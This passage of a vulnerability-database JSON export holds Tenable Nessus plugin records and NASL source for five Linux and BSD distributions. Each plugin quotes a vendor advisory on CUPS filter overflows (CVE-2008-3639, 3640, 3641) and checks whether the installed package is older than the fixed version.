["CVE-2008-3641", "CVE-2008-3639", "CVE-2008-3640"], "modified": "2008-10-13T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:cups-base", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_CE29CE1D971A11DDAB7E001C2514716C.NASL", "href": "https://www.tenable.com/plugins/nessus/34391", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(34391);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2008-3639\", \"CVE-2008-3640\", \"CVE-2008-3641\");\n\n script_name(english:\"FreeBSD : cups -- multiple vulnerabilities (ce29ce1d-971a-11dd-ab7e-001c2514716c)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The release note of cups 1.3.9 reports :\n\nIt contains the following fixes :\n\n- SECURITY: The HP-GL/2 filter did not range check pen numbers (STR\n#2911)\n\n- SECURITY: The SGI image file reader did not range check 16-bit run\nlengths (STR #2918)\n\n- SECURITY: The text filter did not range check cpi, lpi, or column\nvalues (STR #2919)\n\nExploitation of this vulnerability results in the execution of\narbitrary code with the privileges of the affected service.\"\n );\n # https://vuxml.freebsd.org/freebsd/ce29ce1d-971a-11dd-ab7e-001c2514716c.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?bc29d56d\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_cwe_id(119, 189, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:cups-base\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/10/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/10/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/10/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"cups-base<1.3.9\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T09:10:23", "description": "New cups packages are available for Slackware 12.0, 12.1, and\n-current to fix security issues.", "edition": 22, "published": "2008-11-09T00:00:00", "title": "Slackware 12.0 / 12.1 / current : cups (SSA:2008-312-01)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-3641", "CVE-2008-3639", "CVE-2008-3640"], "modified": "2008-11-09T00:00:00", "cpe": ["p-cpe:/a:slackware:slackware_linux:cups", "cpe:/o:slackware:slackware_linux:12.0", "cpe:/o:slackware:slackware_linux", "cpe:/o:slackware:slackware_linux:12.1"], "id": "SLACKWARE_SSA_2008-312-01.NASL", "href": "https://www.tenable.com/plugins/nessus/34719", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security Advisory 2008-312-01. The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(34719);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-3639\", \"CVE-2008-3640\", \"CVE-2008-3641\");\n script_xref(name:\"SSA\", value:\"2008-312-01\");\n\n script_name(english:\"Slackware 12.0 / 12.1 / current : cups (SSA:2008-312-01)\");\n script_summary(english:\"Checks for updated package in /var/log/packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Slackware host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New cups packages are available for Slackware 12.0, 12.1, and\n-current to fix security issues.\"\n );\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2008&m=slackware-security.406571\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?d1ec756b\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected cups package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_cwe_id(119, 189, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:cups\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:12.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:12.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/11/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/11/09\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Slackware Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"12.0\", pkgname:\"cups\", pkgver:\"1.3.9\", pkgarch:\"i486\", pkgnum:\"1_slack12.0\")) flag++;\n\nif (slackware_check(osver:\"12.1\", pkgname:\"cups\", pkgver:\"1.3.9\", pkgarch:\"i486\", pkgnum:\"1_slack12.1\")) flag++;\n\nif (slackware_check(osver:\"current\", pkgname:\"cups\", pkgver:\"1.3.9\", pkgarch:\"i486\", pkgnum:\"1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:slackware_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T10:06:43", "description": "Security release. This updates to 1.3.9 and fixes three integer\noverflows in the CUPS text and image filters.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 25, "published": "2008-10-16T00:00:00", "title": "Fedora 8 : cups-1.3.9-1.fc8 (2008-8801)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-3641", "CVE-2008-3639", "CVE-2008-3640"], "modified": "2008-10-16T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:8", "p-cpe:/a:fedoraproject:fedora:cups"], "id": "FEDORA_2008-8801.NASL", "href": "https://www.tenable.com/plugins/nessus/34424", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2008-8801.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(34424);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2008-3639\", \"CVE-2008-3640\", \"CVE-2008-3641\");\n script_bugtraq_id(31688, 31690);\n script_xref(name:\"FEDORA\", value:\"2008-8801\");\n\n script_name(english:\"Fedora 8 : cups-1.3.9-1.fc8 (2008-8801)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security release. This updates to 1.3.9 and fixes three integer\noverflows in the CUPS text and image filters.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=464710\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=464713\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=464716\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2008-October/015271.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?5fd28794\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected cups package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_cwe_id(119, 189, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:cups\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:8\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/10/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/10/16\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^8([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 8.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC8\", reference:\"cups-1.3.9-1.fc8\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"cups\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-06T09:45:08", "description": "Several local vulnerabilities have been discovered in the Common UNIX\nPrinting System. The Common Vulnerabilities and Exposures project\nidentifies the following problems :\n\n - CVE-2008-3639\n It was discovered that insufficient bounds checking in\n the SGI image filter may lead to the execution of\n arbitrary code.\n\n - CVE-2008-3640\n It was discovered that an integer overflow in the\n Postscript conversion tool 'texttops' may lead to the\n execution of arbitrary code.\n\n - CVE-2008-3641\n It was discovered that insufficient bounds checking in\n the HPGL filter may lead to the execution of arbitrary\n code.", "edition": 28, "published": "2008-10-21T00:00:00", "title": "Debian DSA-1656-1 : cupsys - several vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-3641", "CVE-2008-3639", "CVE-2008-3640"], "modified": "2008-10-21T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:4.0", "p-cpe:/a:debian:debian_linux:cupsys"], "id": "DEBIAN_DSA-1656.NASL", "href": "https://www.tenable.com/plugins/nessus/34449", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-1656. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(34449);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2008-3639\", \"CVE-2008-3640\", \"CVE-2008-3641\");\n script_xref(name:\"DSA\", value:\"1656\");\n\n script_name(english:\"Debian DSA-1656-1 : cupsys - several vulnerabilities\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several local vulnerabilities have been discovered in the Common UNIX\nPrinting System. The Common Vulnerabilities and Exposures project\nidentifies the following problems :\n\n - CVE-2008-3639\n It was discovered that insufficient bounds checking in\n the SGI image filter may lead to the execution of\n arbitrary code.\n\n - CVE-2008-3640\n It was discovered that an integer overflow in the\n Postscript conversion tool 'texttops' may lead to the\n execution of arbitrary code.\n\n - CVE-2008-3641\n It was discovered that insufficient bounds checking in\n the HPGL filter may lead to the execution of arbitrary\n code.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2008-3639\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2008-3640\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2008-3641\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2008/dsa-1656\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the cupsys package.\n\nFor the stable distribution (etch), these problems have been fixed in\nversion 1.2.7-4etch5.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_cwe_id(119, 189, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:cupsys\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:4.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/10/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/10/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"4.0\", prefix:\"cupsys\", reference:\"1.2.7-4etch5\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"cupsys-bsd\", reference:\"1.2.7-4etch5\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"cupsys-client\", reference:\"1.2.7-4etch5\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"cupsys-common\", reference:\"1.2.7-4etch5\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"cupsys-dbg\", reference:\"1.2.7-4etch5\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"libcupsimage2\", reference:\"1.2.7-4etch5\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"libcupsimage2-dev\", reference:\"1.2.7-4etch5\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"libcupsys2\", reference:\"1.2.7-4etch5\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"libcupsys2-dev\", reference:\"1.2.7-4etch5\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"libcupsys2-gnutls10\", reference:\"1.2.7-4etch5\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T10:06:43", "description": "Security release. This updates to 1.3.9 and fixes three integer\noverflows in the CUPS text and image filters.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 25, "published": "2008-10-16T00:00:00", "title": "Fedora 9 : cups-1.3.9-1.fc9 (2008-8844)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-3641", "CVE-2008-3639", "CVE-2008-3640"], "modified": "2008-10-16T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:9", "p-cpe:/a:fedoraproject:fedora:cups"], "id": "FEDORA_2008-8844.NASL", "href": "https://www.tenable.com/plugins/nessus/34425", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2008-8844.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(34425);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2008-3639\", \"CVE-2008-3640\", \"CVE-2008-3641\");\n script_bugtraq_id(31688, 31690);\n script_xref(name:\"FEDORA\", value:\"2008-8844\");\n\n script_name(english:\"Fedora 9 : cups-1.3.9-1.fc9 (2008-8844)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security release. This updates to 1.3.9 and fixes three integer\noverflows in the CUPS text and image filters.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=464710\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=464713\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=464716\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2008-October/015320.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f999328d\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected cups package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_cwe_id(119, 189, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:cups\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:9\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/10/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/10/16\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^9([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 9.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC9\", reference:\"cups-1.3.9-1.fc9\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"cups\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:02:17", "description": "Specially crafted print jobs could trigger buffer overflows in the\n'imagetops', 'texttops' and 'hpgltops' filters. Attackers could\npotentially exploit that to execute arbitrary code on the cups server.\n(CVE-2008-3639, CVE-2008-3640, CVE-2008-3641)", "edition": 25, "published": "2009-09-24T00:00:00", "title": "SuSE9 Security Update : CUPS (YOU Patch Number 12261)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-3641", "CVE-2008-3639", "CVE-2008-3640"], "modified": "2009-09-24T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE9_12261.NASL", "href": "https://www.tenable.com/plugins/nessus/41247", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(41247);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-3639\", \"CVE-2008-3640\", \"CVE-2008-3641\");\n\n script_name(english:\"SuSE9 Security Update : CUPS (YOU Patch Number 12261)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 9 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Specially crafted print jobs could trigger buffer overflows in the\n'imagetops', 'texttops' and 'hpgltops' filters. Attackers could\npotentially exploit that to execute arbitrary code on the cups server.\n(CVE-2008-3639, CVE-2008-3640, CVE-2008-3641)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-3639.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-3640.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2008-3641.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply YOU patch number 12261.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_cwe_id(119, 189, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/10/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/09/24\");\n 